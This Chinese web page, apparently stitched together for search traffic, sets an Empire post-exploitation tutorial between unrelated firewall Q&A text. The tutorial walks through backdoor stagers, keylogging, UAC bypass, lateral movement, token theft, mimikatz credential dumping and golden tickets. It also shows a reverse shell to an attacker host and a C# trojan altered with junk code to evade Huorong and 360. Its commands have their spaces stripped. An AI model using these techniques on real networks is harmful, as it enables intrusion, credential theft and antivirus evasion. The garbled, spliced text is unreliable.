火绒安全无arp防火墙 是否需要开启自带防火墙取决于具体使用场景

Empire后渗透框架主要用于Windows内网渗透，该框架主要基于Powershell和Python，它提供了一个模块的架构，帮助攻击者可以创建和执行各种攻击策略，支持包括域内渗透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。

官网：

0x01下载安装

安装Empire由两种方式，分别是基于源码安装和apt包安装

源码安装

在Github中下载Empire

gitclone

 直接安装Empire会报错

./setup/install.sh

 需要安装以下Python库，当然在安装库时会遇到很多问题，以下是遇到问题后的解决方法

pipinstallpyOpenSSLpipinstalliptoolspipinstallnetifacespipinstallpydispatchpipinstallpydispatcherpipinstallzlib_wrapperpipinstallmacholibpipinstallxlrdpipinstallxlutilspipinstallpyminifierpipinstalldropboxpipinstallpefile

 importlib无法安装解决方法

apt-getinstallbuild-essentialpython3-devpython2-devlibssl-devswig

 M2Crypto无法安装解决方法

pipinstall~/Desktop/M2Crypto-0.38.0.tar.gz

 dispatch无法安装解决方法

pipinstall--upgradesetuptools

 CryPto.Cipher报错解决方法

pipuninstallcryptopipinstallpycrypto

 
  下载地址：


 安装完成后成功启动Empire


 APT包安装


 使用apt包安装Empire

aptinstallpowershell-empirepowershell-empire

 0x02基础使用


 设置监听器


 进入Empire输入help可查看帮助文档


 输入listeners进入监听器设置，按tab自动补全（如果不清楚均可使用该方法）


 设置http监听器

uselistenerhttpinfo#查看监听器信息

 在监听器模块中带有True属性的值必须填写，其他属性可能会存在默认值，使用set和unset可改变设置，首先设置监听器名为test

setNametest

 设置监听默认是80端口，但是80端口通常是Web服务器，修改端口为8080

setHost

 开启监听器


 删除监听器

backlistkilltest

 生成后门


 使用usestager选择后门模块

usestagerwindows/launcher_bat

 设置监听器和输出目录

setListenertestsetOutFile/tmp/lanuncher.bat#默认输出/tmp目录execute

 在/tmp目录成功找到生成后门


 把输出的后门放入目标系统中执行，执行成功后收到响应


 活动代理


 使用agents查看当前会话，通过interact进入会话

agentsinteract22FLR8SU

 如果觉得会话名称太过复杂，可重命名会话

renamewin7

 agents下可使用命令如下：


 命令执行


 查看系统信息


 查询agents命令

helpagentscmds

 执行终端命令

shellwhoami

 基本功能


 使用截图功能


 使用键盘记录

usemodulecollection/keyloggerexecute

 使用剪切版

usemodulecollection/clipboard_monitorexecute

 0x03常见模块


 主机扫描


 ARP扫描模块

sleep0#设置间隔时间usemodulesituational_awareness/network/arpscansetRange192.168.0.1-192.168.0.100execute

 SMB扫描模块

usemodulesituational_awareness/network/smbscannersetUserNameadministratorsetPasswordmacexecute

 端口扫描模块

usemodulesituational_awareness/network/portscansetHosts192.168.0.1-100setPorts445execute

 信息收集


 查找本地管理员主机

usemodulesituational_awareness/network/powerview/find_localadmin_accessexecute

 查看共享文件

usemodulesituational_awareness/network/powerview/share_finderexecute

 Windows本地信息收集

usemodulesituational_awareness/host/winenumexecute

 权限提升


 当前权限并非管理员，需要提权操作


 使用UACbypass模块提权

usemoduleprivesc/bypassuacsetListenertestexecute

 使用powerup检查可提权项，找到后可利用环境向量提权

usemoduleprivesc/powerup/allcheckssetListenertestexecute

 使用计划任务进行提权

usemodulepersistence/elevated/schtasks*setListenertestexecute

 通过溢出漏洞提权，比如烂土豆漏洞

usemoduleprivesc/ms16-032或usemoduleprivesc/ms16-135setListenertestexecute

 成功提权至SYSTEM


 0x04域内渗透


 环境介绍

DC:192.168.52.138T1:192.168.52.128192.168.0.100D1:192.168.52.141

 当前已取得域内普通用户mac和本地管理员权限


 信息收集


 基础信息收集，包括系统信息、用户信息、网络环境等

sysinfowhoamiinfo

 使用ARP扫描，成功找到192.168.52.0/24存在四台主机

usemodulesituational_awareness/network/arpscansetRange192.168.52.0/24execute

 查找本地管理员

usemodulesituation_awareness/network/powerview/find_localadmin_accessexecute

 查看当前用户是否为其他主机上的本地管理员

shelldir\\192.168.52.141\C$

 成功找到域控主机IP为192.168.52.138

usemodulesituation_awareness/network/powerview/get_domain_controllerexecute

 横向移动


 使用会话注入需要管理员权限，切换本地管理员后把当前会话注入到其他主机上

usemodulelateral_movement/invoke_psexecsetListenertestsetComputerNamestu1execute

 使用invoke_wmi模块相比invoke_psexec更加隐蔽

usemodulelateral_movement/invoke_wmisetListenertestsetComputerNamestu1execute

 窃取token


 在新会话中查看进程发现域管理员进程


 选择目标PID号后窃取域管理员token

steal_token1740shelldir\\OWA\C$

 如果需要恢复原来的身份可使用以下命令


 凭证获取


 利用mimikatz拿到管理员密码明文和哈希


 查看所有用户凭证如下：


 利用哈希传递可拿到域控访问权限


 黄金票据


 在域控下使用lsadump模块获取域内所有用户哈希

usemodulecredentials/mimikatz/lsadumpcreds

 成功拿到krbtgt用户哈希


 利用golden_ticket制作黄金票据

usemodulecredentials/mimikatz/golden_ticketsetcredid10setuseradministratorexecute

 0x05会话管理


 会话生成


 使用spawn模块生成新会话

usemodulemanagement/spawnsetListenertestexecute

 进程注入


 查看进程并选择需注入的进程ID


 成功注入winlogon进程

psinjecttest1120

 注入这类系统进程不会出现蓝屏


 MSF会话联动


 首先在MSF中设置http监听

useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_httpsetlhost192.168.0.50setlport4444exploit-j

 在Empire中设置反弹，其中payload需要与上对应

usemodulecode_execution/invoke_shellcodesetLhost192.168.0.50setLport4444setPayloadreverse_httpexecute

 经测试未受到反弹shell，查阅资料后发现Empire转到MSF存在局限性，具体可查看

 0x06Empire-Web


 下载安装


 Empire存在web版本，把PHP和Empire结合的方式通过网页进行访问


 
  下载地址：


 下载empire-web

gitclone

 安装PHP扩展，需根据本机的PHP版本进行修改

apt-getinstallphp7.4-curl

 重启Apache后启用扩展

/etc/init.d/apache2restart

 基础使用


 设置绑定端口和登录账号密码

./empire--rest--restport1337--usernameadmin--password3mpir3admin

 访问站点输入账号密码admin/3mpir3admin


 成功登录能够可视化各个模块


 查看Agents模块


 查看已获取的用户凭证


 查看文件系统


 0x07免杀模块


 生成csharp木马


 准备VisualStido用于编译C#文件


 
  下载地址：


 生成C#类型木马

usestagerwindows/csharp_exesetListenertestinfoexecute

 成功生成后门文件launcher.src


 csharp编译免杀


 使用VisualStdio打开cmd.sln


 需要安装.net2.0环境，打开程序与功能中的添加或删除程序安装net3.5版本，如果无法安装，打开组策略》系统〉指定可选组件安装和组件修复的设置


 
  .net支持：


 修改命名空间为mac123并添加花指令

vara="12345678";varb="67890123";

 完成后编译生成程序文件


 免杀效果


 使用火绒成功免杀


 使用360成功免杀


 但是执行后360会对行为查杀，上线则不受影响


 成功进入新会话当中

interactXWVH8ME2


 防火墙应该开着还是关着？


 必须是开着防火墙开着或许会占用你的网速 但是好的防火墙绝对保障你的安全很多网络初级用户认为，只要装了杀毒软件，系统就绝对安全了，这种想法是很危险的！在现今的网络安全环境下，木马、病毒肆虐，黑客攻击频繁，而各种流氓软软件、间谍软件也行风作浪。
  
  怎样才能让我们的系统保全于如此险恶的网络环境呢？光靠杀毒软件足以保证我们的系统安全吗？下面我就从影响系统安全的几个方面来剖析防火墙的重要性。
  
  现在的网络安全威胁主要来自病毒攻击、木马攻击、黑客攻击以及间谍软件的窃密。
  
  杀毒软件发展了十几年，依然是停留在被动杀毒的层面（当主动防御这个概念出现以后，国内一些杀毒厂商纷纷标榜已经实现主动防御，实际上无非是炒作一些概念赚取眼球，这点急功近利的心理也是导致他们停滞不前的原因之一），从杀毒软件的原理来看，杀毒软件之所以能杀毒，纯粹是根据病毒样本的代码特征来识别他是否是病毒，而且这个特征码还是需要在用户反映遇到病毒后上传病毒样本才能获取。
  
  就如某人被偷了，幸运的是他抓住了这个小偷，于是告诉警察他抓住一个长头发戴眼镜的小偷，于是警察就天天在街上盯着那些留着长头发戴着眼睛的人。
  
  这样的防御效果可想而知。
  
  同样的道理，杀毒软件对于木马、间谍软件的防范也是基于这种被动的方式。
  
  病毒和木马的制造者们抓住了杀毒软件的这个致命弱点，不停地开发新的变种，代码特征的频繁改变让被动的杀毒软件无所适从。
  
  从全球范围内来看，能造成较大损失的病毒、木马大部分都是新出现的，或者是各类变种。
  
  由于这些病毒木马的特征并没有被杀毒软件掌握，因此杀毒软件对它们是既不能报警，也无法剿杀，甚至导致一些杀毒软件本身都被病毒杀死而无法启动！难道我们就只有任病毒木马宰割的份了吗？当然不！我们还有严守大门的防火墙呢！防火墙为什么就能挡住病毒木马甚至是最新的变种呢？这就要从防火墙的防御机制说起了。
  
  防火墙是根据连接网络的数据包来进行监控的，也就是说，防火墙就相当于一个严格的门卫，掌管系统的各扇门（端口），它负责对进出的所有人（应用程序所发出的数据包）进行身份核实，每个人都需要得到最高长官的许可才可以出入，而这个最高长官，就是你自己了。
  
  每当有不明的程序想要进入系统，或者连出网络，防火墙都会在第一时间拦截，并检查身份，如果是经过你许可放行的（比如在应用规则设置中你允许了某一个程序连接网络），防火墙会放行该程序所发出的所有数据包，如果检测到这个程序并没有被许可放行，则自动弹出提示是否允许这个程序通行，这时候就需要你这个“最高统帅”做出判断了。
  
  一般来说，自己没有运行或者不太了解的程序，我们一律禁止通行，并通过搜索引擎或者防火墙的提示确认该软件的性质。
  
  写到这里，大家估计对杀毒软件和防火墙的区别有一定了解了。
  
  举个直观的例子：你的系统就好比一座城堡，你是这个城堡的最高统帅，杀毒软件和防火墙是负责安全的警卫，各有分工。
  
  杀毒软件负责对进入城堡的人进行鉴别，如果发现可疑的人物就抓起来（当然，抓错的几率很大，不然就没有这么多误杀误报事件了）；而防火墙则是门卫，对每一个进出城堡的人都进行检查，一旦发现没有出入证的人就向最高统帅确认。
  
  因此，任何木马或者间谍软件，或许可能在杀毒软件的眼皮底下偷偷记录你的帐号密码，可是由于防火墙把城门守得滴水不漏，阻止了所有木马或间谍软件发出去的信息，从而保护了你的系统安全。
  
  另外，防火墙还有一个优点，就是可以防御黑客对系统的攻击，这是杀毒软件无法做到的，因为黑客的操作不具有任何特征码，杀毒软件自然无法识别，而防火墙则可以把你系统的每个端口都隐藏起来，黑客扫描你的IP的时候，不返回任何数据包，这样黑客就无法发现你这个系统的存在，从而使对方无法攻击你。
  
  总结一下使用防火墙需要注意的几点：1 防火墙就像看门狗，如果你没钱装防盗门（硬件防火墙），那么养个狗是不错的选择.2 狗多了并不是好事，两个狗一起会经常打架，所以不要装多个防火墙，除非你想系统冲突导致崩溃。
  
  3 食量很大的狗不是普通人就能养的起的，因此建议装个节省资源的防火墙，除非你的内存实在大得可以当硬盘.4一条灵敏的狗胜过N条蹩脚的狗，如果防火墙的处理速度不够快，当通过系统的数据包很多的时候，就要严重影响系统效率了，甚至彻底死机。
  
  5 养一条不听话的藏獒还不如养一条容易驾驭的家犬，防火墙也是一样，易用性决定你是否能轻易驾驭它。


 在家里有必要安装ARP防火墙吗？它是干啥用的？


 在家里不用装的`` 是局域网里用的`` ARP防火墙通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址。
  
  ARP防火墙几大功能 1. 拦截ARP攻击。
  
  (A) 在系统内核层拦截外部虚假ARP数据包，保障系统不受ARP欺骗、ARP攻击影响，保持网络畅通及通讯安全； (B) 在系统内核层拦截本机对外的ARP攻击数据包，以减少感染恶意程序后对外攻击给用户带来的麻烦； 2. 拦截IP冲突。
  
  在系统内核层拦截IP冲突数据包，保障系统不受IP冲突攻击的影响； 3. Dos攻击抑制。
  
  在系统内核层拦截本机对外的TCP SYN/UDP/ICMP/ARP DoS攻击数据包，定位恶意发动DoS攻击的程序，从而保证网络的畅通； 4. 安全模式。
  
  除了网关外，不响应其它机器发送的ARP Request，达到隐身效果，减少受到ARP攻击的几率； 5. ARP数据分析。
  
  分析本机接收到的所有ARP数据包，掌握网络动态，找出潜在的攻击者或中毒的机器； 6. 监测ARP缓存。
  
  自动监测本机ARP缓存表，如发现网关MAC地址被恶意程序篡改，将报警并自动修复，以保持网络畅通及通讯安全； 7. 主动防御。
  
  主动与网关保持通讯，通告网关正确的MAC地址，以保持网络畅通及通讯安全； 8. 追踪攻击者。
  
  发现攻击行为后，自动快速锁定攻击者IP地址； 9. ARP病毒专杀。
  
  发现本机有对外攻击行为时，自动定位本机感染的恶意程序、病毒程序； 10. 系统时间保护。
  
  防止恶意程序修改系统时间，导致一些安全防护软件失效。
  
  11. IE首页保护。
  
  防止IE首页被恶意程序篡改。
  
  12. ARP缓存保护。
  
  防止恶意程序篡改本机ARP缓存。
  
  13. 自身进程保护。
  
  防止被恶意软件终止。
  
  14. 智能防御。
  
  在只有网关受到攻击的情况下，智能防御功能可以检测到并做出反应，保障网络畅通！


 如果用火绒，还需要打开自带的防火墙吗


 裸奔都不用开防火墙，局域网环境下最好不要开防火墙